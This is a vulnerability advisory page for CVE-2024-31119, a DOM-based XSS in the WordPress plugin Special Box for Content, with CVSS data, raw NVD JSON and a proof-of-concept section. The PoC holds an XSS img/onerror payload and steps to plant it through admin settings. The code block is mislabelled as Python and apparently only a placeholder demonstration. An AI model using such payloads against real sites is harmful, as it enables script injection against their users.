Security Vulnerability Report
中文
CVE-2024-31119 CVSS 5.9 MEDIUM

CVE-2024-31119

Published: 2026-03-20 10:16:18
Last Modified: 2026-04-22 21:32:08
Source: [email protected]

Description

Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Vasilis Triantafyllou Special Box for Content allows DOM-Based XSS.This issue affects Special Box for Content: from n/a through 1.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Special Box for Content <= 1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2024-31119 (DOM-Based XSS) This payload demonstrates the execution of arbitrary JavaScript via a vulnerable parameter. --> <script> // Step 1: Identify the vulnerable parameter (e.g., 'sb_content') // Step 2: Inject the payload into the URL or input field // Example Payload to be injected: // "><img src=x onerror=alert(1)> // If the plugin reflects this input into the DOM using innerHTML without sanitization: var vulnerableElement = document.querySelector('.special-box-content'); // Simulating the vulnerable behavior: // vulnerableElement.innerHTML = unescapedUserInput; console.log("If vulnerable, an alert box with '1' should appear."); </script> <!-- Actual reproduction steps: 1. Log in as a high-privileged user (Admin). 2. Navigate to the Special Box settings. 3. Inject the payload "><img src=x onerror=alert('CVE-2024-31119')> into a text field. 4. Save the configuration. 5. Visit a page where this box is rendered. 6. Observe the JavaScript execution. -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-31119", "sourceIdentifier": "[email protected]", "published": "2026-03-20T10:16:17.790", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Vasilis Triantafyllou Special Box for Content allows DOM-Based XSS.This issue affects Special Box for Content: from n/a through 1."}, {"lang": "es", "value": "Vulnerabilidad de neutralización incorrecta de la entrada durante la generación de páginas web ('cross-site scripting') en Vasilis Triantafyllou Special Box for Content permite XSS basado en DOM. Este problema afecta a Special Box for Content: desde n/d hasta 1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/special-box-for-content/vulnerability/wordpress-download-special-box-for-content-plugin-1-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.